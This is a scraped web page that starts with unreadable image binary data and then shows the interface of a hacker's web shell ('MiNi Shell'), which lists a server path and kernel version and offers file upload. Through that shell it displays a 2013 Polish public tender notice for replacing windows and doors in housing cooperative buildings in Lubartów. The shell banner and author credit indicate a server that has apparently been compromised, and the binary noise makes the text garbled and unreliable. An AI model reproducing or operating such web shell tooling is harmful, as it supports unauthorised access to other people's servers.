JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130411/141814-N-2013.html

<p class="kh_header"><b>Lubartów: Wymiana stolarki okiennej w piwnicach i na klatkach schodowych oraz drzwi wejściowych i naświetli do budynków mieszkalnych wielorodzinnych przy ul.: Cichej 17, Szaniawskiego 68, Lipowa 6A, Słowackiego 13, Szopena 15 w Lubartowie objętych termomodernizacją będących w zasobach Spółdzielni Mieszkaniowej w Lubartowie</b><br>
<b>Numer ogłoszenia: 141814 - 2013; data zamieszczenia: 11.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółdzielnia Mieszkaniowa w Lubartowie , ul. Cicha 6, 21-100 Lubartów, woj. lubelskie, tel. 081 463 90 01, faks 081 855 30 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smlubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółdzielnia Mieszkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej w piwnicach i na klatkach schodowych oraz drzwi wejściowych i naświetli do budynków mieszkalnych wielorodzinnych przy ul.: Cichej 17, Szaniawskiego 68, Lipowa 6A, Słowackiego 13, Szopena 15 w Lubartowie objętych termomodernizacją będących w zasobach Spółdzielni Mieszkaniowej w Lubartowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wymiana stolarki okiennej w piwnicach i na klatkach schodowych oraz drzwi wejściowych i naświetli do budynków mieszkalnych wielorodzinnych przy ul.: Cichej 17, Szaniawskiego 68, Lipowej 6A, Słowackiego 13, Szopena 15 w Lubartowie objętych termomodernizacją, będących w zasobach Spółdzielni Mieszkaniowej w Lubartowie . 
Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV): 
45.42.10.00-4 Roboty w zakresie stolarki budowlanej 
2. Zakres przedmiotu zamówienia
Przedmiot zamówienia zostaje podzielony na dwie części: 
Część I oznaczona jako część A - dotyczy ślusarki drzwiowej i naświetli. 
Część II oznaczona jako część B - dotyczy stolarki okiennej na klatkach schodowych i w piwnicach
Czynności do wykonania przy wymianie ślusarki drzwiowej i naświetli oraz stolarki okiennej na klatkach schodowych i w piwnicach : 
1.dostawa nowych drzwi zewnętrznych do budynków oraz naświetli z AL tzw. ciepły profil, naświetla uchylne, oraz drzwi zewnętrznych do wiatrołapów tzw. zimny profil - dotyczy drzwi na budynkach przy ul. : Lipowa 6A, Słowackiego 13, Szopena 15 wg poniższej tabeli,
2.dostawa nowych okien z PCV, 
3. demontaż starych drzwi, naświetli, krat i zwrot Zamawiającemu starych drzwi, krat - dostarczenie ich do magazynu wskazanego przez Zamawiającego na terenie Lubartowa,
4. montaż nowych drzwi z klamkami pochwytami i naświetli,  montaż nowych okien wraz z klamkami - drzwi i naświetla oraz okna montować na kotwy systemowe z uszczelnieniem ich pianką poliuretanową i następnie przycięcie rozprężonej i suchej pianki poliuretanowej, 
5. zabezpieczenie powierzchni stolarki drzwiowej i naświetli oraz stolarki okiennej taśmą i folią malarską przed robotami związanymi z wykończeniem powierzchni ościeży zewnętrznych i wewnętrznych,
6.  wykończenie ościeży glify wewnętrznych i zewnętrznych  gotowymi zaprawami tynkarskimi zgodnie ze stanem istniejącym,
7. niezbędne prace malarskie kolorystyka zgodnie ze stanem istniejącym,
8. regulacja okuć stolarki drzwiowej i naświetli oraz stolarki okiennej,
9.montaż w drzwiach elektrozaczepów  i zamków z wkładką symetryczną
10.montaż w drzwiach samozamykaczy z blokadą  pozycji otwartej, 
11.wykonanie otworów montaż kratek wentylacyjnych o odpowiedniej wielkości  w drzwiach zewnętrznych wiatrołapów  - dotyczy budynków przy ul.: Chopina 15, Słowackiego 13, Lipowa 6A  celem wyeliminowania poduszki powietrznej, która  uniemożliwia prawidłowe domknięcie drzwi, 
12.w razie potrzeby montaż i demontaż istniejących podokienników wewnętrznych i zewnętrznych z blachy,
13.w razie potrzeby montaż listew maskujących przy przy progu ościeżnic okiennych,
14.montaż odbojów przy wszystkich montowanych drzwiach,
15.przełożenie istniejących domofonów do nowo zamontowanych paneli drzwiowych w uzgodnieniu i pod nadzorem wyznaczonego przedstawiciela Spółdzielni - w przypadku złego stanu technicznego domofonu Spółdzielnia dostarczy nowy panel rozmowny,
16.porządkowanie terenu,
17.dostarczenie do siedziby zamawiającego:
po 3 szt. kluczy do każdych drzwi - dotyczy budynków przy ul.: Cicha 17, Szaniawskiego 68 drzwi bez domofonu i drzwi do budynków przy ul.: Lipowa 6A Słowackiego 13Szopena 15  .
po 1 szt. kluczy do każdego mieszkania gdzie wymieniane są drzwi wejściowe wiatrołapu tylko do drzwi w których jest domofon, - dotyczy budynków przy ul.:
Lipowa 6A  -  20szt   
Słowackiego 13 - 32szt   
Szopena 15  - 48szt
Podział i wymiary okien oraz drzwi zgodnie z załączonym zestawieniem stolarki okiennej i drzwiowej  z Projektów wykonawczych termomodernizacji poszczególnych budynków.
Okna/drzwi przewidziane do wymiany posiadają niżej wymienione wymiary w cm (wymiary orientacyjne) służą na potrzeby oszacowania ceny ofertowej (muszą zostać zweryfikowane przez oferenta przed złożeniem oferty) - wymiary okien drzwi montowanych w ramach zamówienia zostaną  zweryfikowane z rzeczywistym ich obmiarem:
część A
część B
Lp.
Adres
Drzwi szt
 drzwi z elektrozaczepem 
Wymiary cm
Naświetla
szt
Wymiary cm
Okna na klatkach
szt
Wymiary cm
Okienka piwniczne szt
Wymiary cm
1
Cicha 17
3
ciepły profil 
TAK
100x210
-
12
50x41
3
ciepły profil 
100x35
6
80x42
2
Szaniawskiego 68
1 
ciepły profil
TAK
100x205
1
85x115 klamka  obustronna, zamek w klamce
14
85x45
3
Lipowa 6A
3
zimny profil 
TAK
237x245
12
90x85
40
90x50
3
ciepły profil 
NIE
120x210
4
Słowackiego 13
5
zimny profil 
TAK
237x245
11
90x85
51
90x60
5
ciepły profil 
NIE
120x210
5
Szopena 15
5
zimny profil 
TAK
237x245 
19
90x85
62
90x60
5
ciepły profil 
NIE
120x210
RAZEM
30
3
43
185
UWAGA!!!
Drzwi o minimum szerokości 90 cm i wysokości (w świetle przejścia) w cenie należy uwzględnić rozkucia w celu uzyskania wymagań normy.
Wymagania ślusarki drzwiowej i naświetli z AL:
-materiał ramy drzwi wejściowych i naświetla - AL (ciepły i zimny profil)
-współczynnik przenikania ciepła dla całych drzwi i naświetli (ciepły profil) U mniejsze równe 1,9 W m2 K, 
-współczynnik przenikania ciepła dla całych drzwi (zimny profil) U mniejsze równe 2,6 W m2 K, 
-ślusarka winna posiadać atest PZH
-pakiet szybowy jednokomorowy  U mniejsze równe 1,1 W m2K (dotyczy ciepłego profilu)
-profile  powinny być odporne na promienie UV
- kolor profili drzwiowych i naświetli - ciemny brąz, 
-głębokość konstrukcyjna  profilu ma wynosić nie mniej jak 68 mm - dla ciepłego profilu, nie mniej jak 50 mm - dla zimnego profilu, a grubość profilu nie mniej jak 2,5 mm dla ślusarki drzwiowej i naświetli,
- sposób otwierania drzwi jedno skrzydłowe wg.  załączonego zestawienia stolarki okiennej drzwiowej  z Projektów wykonawczych termomodernizacji poszczególnych budynków,
- pakiet szybowy od strony wewnętrznej i zewnętrznej szyba bezpieczna P2, 
- drzwi wyposażone w samozamykacz z blokadą pozycji otwartej,  
- naświetla (U) wyposażone w nożyce z możliwością wypięcia i uchylenia skrzydła do 90 stopni,
-okucia wykonane w technologii odpornej na korozję,
- panele drzwiowe nieprzezierne typu  sandwiche.
- napisy na pakiecie szybowym drzwi zewnętrznych wiatrołapów (z numerami klatek schodowych i numerami lokali - przedział, wielkości czcionki ok. 10cm) wykonane metodą piaskowania - dotyczy budynków przy ul.: Chopina 15, Słowackiego 13, Lipowa 6A,
- wszystkie drzwi zewnętrzne wyposażyć w   elektrozaczepy oraz panele umożliwiające zamontowania domofonu (zgodnie z powyższą tabelą).
Wymagania stolarki okiennej na klatkach schodowych i w piwnicach z PCV:
- materiał ramy okiennej - PCV,
- współczynnik przenikania ciepła dla całego okna U mniejsze równe 1,8 W m2K,
- stolarka winna posiadać atest PZH
- pakiet szybowy jednokomorowy  U mniejsze równe 1,1 W m2K,
- profile  powinny być odporne na promienie UV,
- kolor profili okiennych - biały,
- głębokość konstrukcyjna  profilu ma wynosić nie mniej jak 68 mm, a grubość profilu nie mniej jak 2,5 mm dla stolarki okiennej, 
- okna piwniczne uchylne (U) wyposażone w nożyce z możliwością wypięcia i uchylenia skrzydła do 90 stopni okna klatek schodowych rozwierno uchylne (RU), 
-okucia wykonane w technologii odpornej na korozję,
- nie dopuszcza się profili wyprodukowanej w technologii koekstruzji z wykorzystaniem granulatu z odzysku.
Wykonawca zobowiązany będzie do wyznaczenia kierownika budowy który będzie pełnił obowiązki kierownika budowy na budynkach przy ul.:  Lipowa 6A, Słowackiego 13, Szopena 15  po zakończeniu robót związanych z wymianą stolarki okiennej i drzwiowej do czasu rozstrzygnięcia przetargu na roboty termomodernizacyjne.
Zastosowane materiały muszą być udokumentowane kartą techniczną materiału, atestem higienicznym i aprobatą techniczną lub deklaracją zgodności.   
Wykonawca zobowiązany jest do udzielenia gwarancji jakości na wykonane roboty na okres nie krótszy niż 60 miesięcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia przez Wykonawców wadium. Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w przypadku skłania oferty na wykonanie robót:
a) część A w wysokości 5.000,00 zł 
b) część B w wysokości 3.000,00 zł 
2.Wadium może być wnoszone w jednej lub kilku niżej wymienionych formach na cały okres związania ofertą:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych 
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr. 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr.96, poz. 620).
3.Wadium wniesione w pieniądzu wpłaca się na rachunek bankowy Zamawiającego przelewem. Nr rachunku: PKO BP S.A. O Lubartów nr  57 1020 3206 0000 8402 0004 4255 z dopiskiem na przelewie Wadium na wymianę stolarki okiennej w piwnicach i na klatkach schodowych oraz drzwi wejściowych  i naświetli  do budynków mieszkalnych wielorodzinnych w Lubartowie NTI/R-8/2013. O jego wniesieniu w terminie decydować będzie data wpływu na podany wyżej rachunek bankowy Zamawiającego.
Zamawiający wymaga, aby w przypadku wniesienia wadium w formie: 
- pieniężnej dokument potwierdzający wpłatę wadium został dołączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w ofercie. 
4.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub zamknięcia postępowania bez dokonania wyboru oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
6.Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je pomniejszone o koszty prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę (Wykonawca poda w ofercie numer konta na które należy zwrócić wadium wpłacone w formie pieniądza). W przypadku nie wskazania numeru konta Zamawiający zwróci je na rachunek bankowy z którego wadium wpłynęło.)
8.Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana: 
1)  odmówił podpisania umowy w sprawie zamówienia na warunkach określonych w ofercie; 
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)  zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru zał. nr 1 do SIWZ. 
2. Dokument potwierdzający wpłatę wadium.
3. Oświadczenie o akceptacji warunków przetargu zał. nr 2 do SIWZ.5. Wykaz robót budowlanych zał. nr 4, potwierdzonych dołączonymi referencjami.
6. Oświadczenie o braku podstaw do wykluczenia z wykorzystaniem wzoru zał. nr 5.
7. Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku gdy polisa zawarta jest na okres krótszy niż czas realizacji zamówienia, Wykonawca zobowiązany jest niezwłocznie dostarczyć polisę ubezpieczenia OC na kolejne okresy obejmujące łącznie czas realizacji zamówienia.
8. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia z postępowania w postaci otwarcia wobec  wykonawcy likwidacji lub ogłoszenia upadłości, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie, iż brak jest podstaw do wykluczenia wykonawcy, o których mowa w niniejszym punkcie z wykorzystaniem wzoru zał. nr 6.
9. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
 wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert.
10. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Udzielona gwarancja na roboty - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smlubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21 -100 Lubartów, pokój nr 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 11:00, miejsce: Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21 -100 Lubartów, pokój Sekretariatu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com